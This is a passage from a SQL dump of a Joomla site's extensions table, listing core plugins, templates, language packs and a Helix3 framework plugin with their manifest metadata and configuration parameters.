00:00:00',6,0),(410,'plg_editors_codemirror','plugin','codemirror','editors',0,1,1,1,'{\"name\":\"plg_editors_codemirror\",\"type\":\"plugin\",\"creationDate\":\"28 March 2011\",\"author\":\"Marijn Haverbeke\",\"copyright\":\"Copyright (C) 2014 by Marijn Haverbeke <marijnh@gmail.com> and others\",\"authorEmail\":\"marijnh@gmail.com\",\"authorUrl\":\"http:\\/\\/codemirror.net\\/\",\"version\":\"5.6\",\"description\":\"PLG_CODEMIRROR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"codemirror\"}','{\"lineNumbers\":\"1\",\"lineWrapping\":\"1\",\"matchTags\":\"1\",\"matchBrackets\":\"1\",\"marker-gutter\":\"1\",\"autoCloseTags\":\"1\",\"autoCloseBrackets\":\"1\",\"autoFocus\":\"1\",\"theme\":\"default\",\"tabmode\":\"indent\"}','','',0,'0000-00-00 00:00:00',1,0),(411,'plg_editors_none','plugin','none','editors',0,1,1,1,'{\"name\":\"plg_editors_none\",\"type\":\"plugin\",\"creationDate\":\"September 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_NONE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"none\"}','','','',0,'0000-00-00 00:00:00',2,0),(412,'plg_editors_tinymce','plugin','tinymce','editors',0,1,1,0,'{\"name\":\"plg_editors_tinymce\",\"type\":\"plugin\",\"creationDate\":\"2005-2014\",\"author\":\"Moxiecode Systems AB\",\"copyright\":\"Moxiecode Systems AB\",\"authorEmail\":\"N\\/A\",\"authorUrl\":\"tinymce.moxiecode.com\",\"version\":\"4.1.7\",\"description\":\"PLG_TINY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tinymce\"}','{\"mode\":\"1\",\"skin\":\"0\",\"mobile\":\"0\",\"entity_encoding\":\"raw\",\"lang_mode\":\"1\",\"text_direction\":\"ltr\",\"content_css\":\"1\",\"content_css_custom\":\"\",\"relative_urls\":\"1\",\"newlines\":\"0\",\"invalid_elements\":\"script,applet,iframe\",\"extended_elements\":\"\",\"html_height\":\"550\",\"html_width\":\"750\",\"resizing\":\"1\",\"element_path\":\"1\",\"fonts\":\"1\",\"paste\":\"1\",\"searchreplace\":\"1\",\"insertdate\":\"1\",\"colors\":\"1\",\"table\":\"1\",\"smilies\":\"1\",\"hr\":\"1\",\"link\":\"1\",\"media\":\"1\",\"print\":\"1\",\"directionality\":\"1\",\"fullscreen\":\"1\",\"alignment\":\"1\",\"visualchars\":\"1\",\"visualblocks\":\"1\",\"nonbreaking\":\"1\",\"template\":\"1\",\"blockquote\":\"1\",\"wordcount\":\"1\",\"advlist\":\"1\",\"autosave\":\"1\",\"contextmenu\":\"1\",\"inlinepopups\":\"1\",\"custom_plugin\":\"\",\"custom_button\":\"\"}','','',0,'0000-00-00 00:00:00',3,0),(413,'plg_editors-xtd_article','plugin','article','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_article\",\"type\":\"plugin\",\"creationDate\":\"October 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_ARTICLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"article\"}','','','',0,'0000-00-00 00:00:00',1,0),(414,'plg_editors-xtd_image','plugin','image','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_image\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_IMAGE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"image\"}','','','',0,'0000-00-00 00:00:00',2,0),(415,'plg_editors-xtd_pagebreak','plugin','pagebreak','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_EDITORSXTD_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pagebreak\"}','','','',0,'0000-00-00 00:00:00',3,0),(416,'plg_editors-xtd_readmore','plugin','readmore','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_readmore\",\"type\":\"plugin\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_READMORE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"readmore\"}','','','',0,'0000-00-00 00:00:00',4,0),(417,'plg_search_categories','plugin','categories','search',0,1,1,0,'{\"name\":\"plg_search_categories\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"categories\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(418,'plg_search_contacts','plugin','contacts','search',0,1,1,0,'{\"name\":\"plg_search_contacts\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CONTACTS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contacts\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(419,'plg_search_content','plugin','content','search',0,1,1,0,'{\"name\":\"plg_search_content\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(420,'plg_search_newsfeeds','plugin','newsfeeds','search',0,1,1,0,'{\"name\":\"plg_search_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"newsfeeds\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(422,'plg_system_languagefilter','plugin','languagefilter','system',0,0,1,1,'{\"name\":\"plg_system_languagefilter\",\"type\":\"plugin\",\"creationDate\":\"July 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LANGUAGEFILTER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"languagefilter\"}','{\"detect_browser\":\"0\",\"automatic_change\":\"1\",\"item_associations\":\"1\",\"remove_default_prefix\":\"0\",\"lang_cookie\":\"0\",\"alternate_meta\":\"1\"}','','',0,'0000-00-00 00:00:00',1,0),(423,'plg_system_p3p','plugin','p3p','system',0,1,1,0,'{\"name\":\"plg_system_p3p\",\"type\":\"plugin\",\"creationDate\":\"September 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_P3P_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"p3p\"}','{\"headers\":\"NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM\"}','','',0,'0000-00-00 00:00:00',2,0),(424,'plg_system_cache','plugin','cache','system',0,0,1,1,'{\"name\":\"plg_system_cache\",\"type\":\"plugin\",\"creationDate\":\"February 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CACHE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"cache\"}','{\"browsercache\":\"0\",\"cachetime\":\"15\"}','','',0,'0000-00-00 00:00:00',9,0),(425,'plg_system_debug','plugin','debug','system',0,1,1,0,'{\"name\":\"plg_system_debug\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_DEBUG_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"debug\"}','{\"profile\":\"1\",\"queries\":\"1\",\"memory\":\"1\",\"language_files\":\"1\",\"language_strings\":\"1\",\"strip-first\":\"1\",\"strip-prefix\":\"\",\"strip-suffix\":\"\"}','','',0,'0000-00-00 00:00:00',4,0),(426,'plg_system_log','plugin','log','system',0,1,1,1,'{\"name\":\"plg_system_log\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LOG_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"log\"}','','','',0,'0000-00-00 00:00:00',5,0),(427,'plg_system_redirect','plugin','redirect','system',0,0,1,1,'{\"name\":\"plg_system_redirect\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_REDIRECT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"redirect\"}','','','',0,'0000-00-00 00:00:00',6,0),(428,'plg_system_remember','plugin','remember','system',0,1,1,1,'{\"name\":\"plg_system_remember\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_REMEMBER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"remember\"}','','','',0,'0000-00-00 00:00:00',7,0),(429,'plg_system_sef','plugin','sef','system',0,1,1,0,'{\"name\":\"plg_system_sef\",\"type\":\"plugin\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEF_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"sef\"}','','','',0,'0000-00-00 00:00:00',8,0),(430,'plg_system_logout','plugin','logout','system',0,1,1,1,'{\"name\":\"plg_system_logout\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LOGOUT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"logout\"}','','','',0,'0000-00-00 00:00:00',3,0),(431,'plg_user_contactcreator','plugin','contactcreator','user',0,0,1,0,'{\"name\":\"plg_user_contactcreator\",\"type\":\"plugin\",\"creationDate\":\"August 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTACTCREATOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contactcreator\"}','{\"autowebpage\":\"\",\"category\":\"34\",\"autopublish\":\"0\"}','','',0,'0000-00-00 00:00:00',1,0),(432,'plg_user_joomla','plugin','joomla','user',0,1,1,0,'{\"name\":\"plg_user_joomla\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_USER_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{\"strong_passwords\":\"1\",\"autoregister\":\"1\"}','','',0,'0000-00-00 00:00:00',2,0),(433,'plg_user_profile','plugin','profile','user',0,0,1,0,'{\"name\":\"plg_user_profile\",\"type\":\"plugin\",\"creationDate\":\"January 2008\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_USER_PROFILE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"profile\"}','{\"register-require_address1\":\"1\",\"register-require_address2\":\"1\",\"register-require_city\":\"1\",\"register-require_region\":\"1\",\"register-require_country\":\"1\",\"register-require_postal_code\":\"1\",\"register-require_phone\":\"1\",\"register-require_website\":\"1\",\"register-require_favoritebook\":\"1\",\"register-require_aboutme\":\"1\",\"register-require_tos\":\"1\",\"register-require_dob\":\"1\",\"profile-require_address1\":\"1\",\"profile-require_address2\":\"1\",\"profile-require_city\":\"1\",\"profile-require_region\":\"1\",\"profile-require_country\":\"1\",\"profile-require_postal_code\":\"1\",\"profile-require_phone\":\"1\",\"profile-require_website\":\"1\",\"profile-require_favoritebook\":\"1\",\"profile-require_aboutme\":\"1\",\"profile-require_tos\":\"1\",\"profile-require_dob\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(434,'plg_extension_joomla','plugin','joomla','extension',0,1,1,1,'{\"name\":\"plg_extension_joomla\",\"type\":\"plugin\",\"creationDate\":\"May 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_EXTENSION_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','','','',0,'0000-00-00 00:00:00',1,0),(435,'plg_content_joomla','plugin','joomla','content',0,1,1,0,'{\"name\":\"plg_content_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','','','',0,'0000-00-00 00:00:00',0,0),(436,'plg_system_languagecode','plugin','languagecode','system',0,0,1,0,'{\"name\":\"plg_system_languagecode\",\"type\":\"plugin\",\"creationDate\":\"November 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LANGUAGECODE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"languagecode\"}','{\"ar-aa\":\"\",\"en-gb\":\"\"}','','',0,'0000-00-00 00:00:00',10,0),(437,'plg_quickicon_joomlaupdate','plugin','joomlaupdate','quickicon',0,1,1,1,'{\"name\":\"plg_quickicon_joomlaupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_QUICKICON_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomlaupdate\"}','','','',0,'0000-00-00 00:00:00',0,0),(438,'plg_quickicon_extensionupdate','plugin','extensionupdate','quickicon',0,1,1,1,'{\"name\":\"plg_quickicon_extensionupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_QUICKICON_EXTENSIONUPDATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"extensionupdate\"}','','','',0,'0000-00-00 00:00:00',0,0),(439,'plg_captcha_recaptcha','plugin','recaptcha','captcha',0,0,1,0,'{\"name\":\"plg_captcha_recaptcha\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.4.0\",\"description\":\"PLG_CAPTCHA_RECAPTCHA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"recaptcha\"}','{\"public_key\":\"\",\"private_key\":\"\",\"theme\":\"clean\"}','','',0,'0000-00-00 00:00:00',0,0),(440,'plg_system_highlight','plugin','highlight','system',0,1,1,0,'{\"name\":\"plg_system_highlight\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_HIGHLIGHT_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',7,0),(441,'plg_content_finder','plugin','finder','content',0,0,1,0,'{\"name\":\"plg_content_finder\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_FINDER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(442,'plg_finder_categories','plugin','categories','finder',0,1,1,0,'{\"name\":\"plg_finder_categories\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"categories\"}','','','',0,'0000-00-00 00:00:00',1,0),(443,'plg_finder_contacts','plugin','contacts','finder',0,1,1,0,'{\"name\":\"plg_finder_contacts\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CONTACTS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contacts\"}','','','',0,'0000-00-00 00:00:00',2,0),(444,'plg_finder_content','plugin','content','finder',0,1,1,0,'{\"name\":\"plg_finder_content\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','','','',0,'0000-00-00 00:00:00',3,0),(445,'plg_finder_newsfeeds','plugin','newsfeeds','finder',0,1,1,0,'{\"name\":\"plg_finder_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"newsfeeds\"}','','','',0,'0000-00-00 00:00:00',4,0),(447,'plg_finder_tags','plugin','tags','finder',0,1,1,0,'{\"name\":\"plg_finder_tags\",\"type\":\"plugin\",\"creationDate\":\"February 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_TAGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tags\"}','','','',0,'0000-00-00 00:00:00',0,0),(448,'plg_twofactorauth_totp','plugin','totp','twofactorauth',0,0,1,0,'{\"name\":\"plg_twofactorauth_totp\",\"type\":\"plugin\",\"creationDate\":\"August 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"PLG_TWOFACTORAUTH_TOTP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"totp\"}','','','',0,'0000-00-00 00:00:00',0,0),(449,'plg_authentication_cookie','plugin','cookie','authentication',0,1,1,0,'{\"name\":\"plg_authentication_cookie\",\"type\":\"plugin\",\"creationDate\":\"July 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_AUTH_COOKIE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(450,'plg_twofactorauth_yubikey','plugin','yubikey','twofactorauth',0,0,1,0,'{\"name\":\"plg_twofactorauth_yubikey\",\"type\":\"plugin\",\"creationDate\":\"September 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"PLG_TWOFACTORAUTH_YUBIKEY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"yubikey\"}','','','',0,'0000-00-00 00:00:00',0,0),(451,'plg_search_tags','plugin','tags','search',0,1,1,0,'{\"name\":\"plg_search_tags\",\"type\":\"plugin\",\"creationDate\":\"March 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_TAGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tags\"}','{\"search_limit\":\"50\",\"show_tagged_items\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(503,'beez3','template','beez3','',0,1,1,0,'{\"name\":\"beez3\",\"type\":\"template\",\"creationDate\":\"25 November 2009\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"3.1.0\",\"description\":\"TPL_BEEZ3_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"templatecolor\":\"nature\"}','','',0,'0000-00-00 00:00:00',0,0),(504,'hathor','template','hathor','',1,1,1,0,'{\"name\":\"hathor\",\"type\":\"template\",\"creationDate\":\"May 2010\",\"author\":\"Andrea Tarr\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"hathor@tarrconsulting.com\",\"authorUrl\":\"http:\\/\\/www.tarrconsulting.com\",\"version\":\"3.0.0\",\"description\":\"TPL_HATHOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"showSiteName\":\"0\",\"colourChoice\":\"0\",\"boldText\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(506,'protostar','template','protostar','',0,1,1,0,'{\"name\":\"protostar\",\"type\":\"template\",\"creationDate\":\"4\\/30\\/2012\",\"author\":\"Kyle Ledbetter\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"TPL_PROTOSTAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"templateColor\":\"\",\"logoFile\":\"\",\"googleFont\":\"1\",\"googleFontName\":\"Open+Sans\",\"fluidContainer\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(507,'isis','template','isis','',1,1,1,0,'{\"name\":\"isis\",\"type\":\"template\",\"creationDate\":\"3\\/30\\/2012\",\"author\":\"Kyle Ledbetter\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"TPL_ISIS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"templateColor\":\"\",\"logoFile\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(600,'English (en-GB)','language','en-GB','',0,1,1,1,'{\"name\":\"English (en-GB)\",\"type\":\"language\",\"creationDate\":\"2013-03-07\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.4.3\",\"description\":\"en-GB site language\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(601,'English (en-GB)','language','en-GB','',1,1,1,1,'{\"name\":\"English (en-GB)\",\"type\":\"language\",\"creationDate\":\"2013-03-07\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.4.3\",\"description\":\"en-GB administrator language\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(700,'files_joomla','file','joomla','',0,1,1,1,'{\"name\":\"files_joomla\",\"type\":\"file\",\"creationDate\":\"December 2015\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.4.8\",\"description\":\"FILES_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10001,'Helix3 - Ajax','plugin','helix3','ajax',0,1,1,0,'{\"name\":\"Helix3 - Ajax\",\"type\":\"plugin\",\"creationDate\":\"Jan 2015\",\"author\":\"JoomShaper.com\",\"copyright\":\"Copyright (C) 2010 - 2015 JoomShaper. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"1.0\",\"description\":\"Helix3 Framework - Joomla Template Framework by JoomShaper\",\"group\":\"\",\"filename\":\"helix3\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10002,'System - Helix3 